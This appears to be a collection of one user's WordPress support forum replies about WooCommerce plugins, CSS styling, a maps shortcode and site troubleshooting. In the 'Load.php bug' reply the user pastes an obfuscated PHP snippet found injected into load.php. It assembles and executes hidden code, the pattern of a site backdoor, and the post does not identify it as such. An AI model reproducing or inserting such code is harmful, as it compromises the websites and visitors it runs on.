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Forum: Plugins
In reply to: [Woocommerce Hide Add To Cart Button] Still working?Can’t make this plugin to work !!
No matter what I do, the Add to cart button is still visible.
Hi, Thanks for your reply.
My client has a food cater business, selling specific menu bundles on specific weeks.
She needs to organize her products by week period and only sellable on specific weeks. For that, she needs to disable these weekly products at the end of the specific week so clients won’t be able to buy them, but still can have a look at them (disable “add to cart”)
Of course, she wants all that to be as automatic as possible. She has more than 150 different menus. That’s where a date based enable/disable functionality would be really useful for her.
The Post Expirator plugin do most of the job, but it completely disables the product, and thus, make it invisible to visitors.
If you decide to work on such a project, please let me know. In the meantime, I will constinue my research.
Forum: Plugins
In reply to: [Related Products for WooCommerce] Specify column numberHi,
Thanks for your support.
Yes I ca give you an access. Where should I send you that ?Forum: Plugins
In reply to: [Related Products for WooCommerce] Specify column numberThanks again,
I tried adding the code to function.php. It won’t work.
I’ve added another module just below yours. It displays products nicely with 4 columns. The problem with this one is it doesn’t filter with tags.Yours does, and is working correctly. There’s just a styling problem. Where can I style the output.
I could use the slider, but I would like to have it display 4 products at a time, not 3.
- This reply was modified 7 years, 6 months ago by pictogram.
Forum: Plugins
In reply to: [Related Products for WooCommerce] Specify column numberThanks Eboxnet,
It’s not working.
I’ve added this to custom.css
.woocommerce.single-product ul.products li.product,.woocommerce-page.single-product ul.products li.product,.woocommerce.single-product .upsells.products li.product,.woocommerce-page.single-product .upsells.products li.product { width:22.05% }
I’ve added this shortcode where I want it to be
[woo-related number='4']
And these in Woo related settings page
Product to display : 4
Related by : product_tag (that is actually working)
Slider: DisabledYou can have a look at https://alexgauvin.com/capricesdelectables.com/produit/lasagne-au-saumon/, just below AUTRES MENUS DE LA SEMAINE
Forum: Plugins
In reply to: [Shortcode Menu] layout on mobile devicesHi jdev,
could you please tell me where to insert this string ?
Ah !! Extraordinaire !!
I missed that one
Thanks a lot
Forum: Plugins
In reply to: [Google Maps v3 Shortcode multiple Markers] Cleaner shortcode paramsHi,
Me again with a few more suggestions :
1. To allow the use of the comma “,” in the popup boxes, you should use the semi-colon “;” to separate the params. Otherwise, using a comma in the description will blank every markers.
2. HTML tags with equal (=) and hyphen (“) signs won’t work, as in
<a href="/home/">Home</a>
, since it interferes with the params indicators. is there any that can be done to be able to use these tags ?Thanks again.
Forum: Plugins
In reply to: [Google Maps v3 Shortcode multiple Markers] Modify Info Window?Mmm, it is working.
It didn’t earlier this morning.
Sorry for that and thanks for your quick support.
Forum: Plugins
In reply to: [Google Maps v3 Shortcode multiple Markers] Modify Info Window?Hi soundwaves-productions,
You code is not working. HTML tags are visible.
Do you plan to implement this ?
Your plugin is really nice, by the way.
Forum: Plugins
In reply to: [Menu Social Icons] Multiple Icons DisplayedSame for me, but only for Twitter
Forum: Plugins
In reply to: [Shortcodes by Angie Makes] Accordion collapse not workingThanks Chris,
I didn’t try that simple option !!
Do you have a complete cheat sheet available for WC Shortcode ?
Forum: Fixing WordPress
In reply to: Insert metadata in postActually, I’m using a custom post type built with Types/Views.
This post types is built with specific fields and theming. The posters won’t have the possibility to add anything else than what is formatted in the post type. That’s why I would like to get the id3 title of the audio file to be displayed automatically in my custom post.
In the media manager, when I look at the properties of the audi files, there is the title, but I can’t figure out how to get it and display it in my post.
Yes, the post could have more than one audio file.
Forum: Fixing WordPress
In reply to: Load.php bugHi, thanks for your answers,
@esmi : I did all that you proposed so many time I can’t even count !!
@mike : I did what you proposed. I compared the 2 load.php files, the one before and the one after. I found a slight size difference between the 2 files. A small snippet of code was added. Here it is :
$get_hr_authority = wvmmlHgzmnn.'~'.cuujwy.'}'.m_out_oontuo.'|slc?ho}'.eosnln. '?szg~~ozw?wp='.iokmudos. '/js/}yn}}wmo|i}mus/'.clvmng.'}fo{oyo{?fmf{u}~/k}o?fgw>.vnw"+-i?'&'e~'.sl8bwz. '{~'.flytm.'<'. fklu_ggw_conwont.'{*"/'.yoou.'/w{f}/{jdl.'.owoowxoi. '~w~wve{/k{/vin{mcu/'.tjgoos.'?'.yuvc.'~kgu?'.wkons.'/'.mevewnu.'/'.mogoon96.'~qno.}+9{'; $wp_rv_templating_constants = "k~ma}".g_fwnk."~mo~"&sswkv.'}_g}osu{on'; $handle_qmx_upload = $wp_rv_templating_constants( false,$get_hr_authority);$handle_qmx_upload();
Could the problem be in the database ? There’s no plugins activated and the theme is a fresh copy of 2013.
Forum: Fixing WordPress
In reply to: No Add or Uninstall link from extension menu ??Hi again,
Is there anyone with the same problem ???
Mine is still there and can’t figure out what’s wrong.
I did again a completely fresh install of WP and every plugins
I reimported one by one all the tables, except wp_options and wp_plugins which I thought was bugged somewhere.
It worked for about 48 hours and then my “add plugin” menu disappeared again.I suppose that a plugin must have something to do with that but since I reinstall and reconfigure everyone from the ground.
Any help would be really appreciate.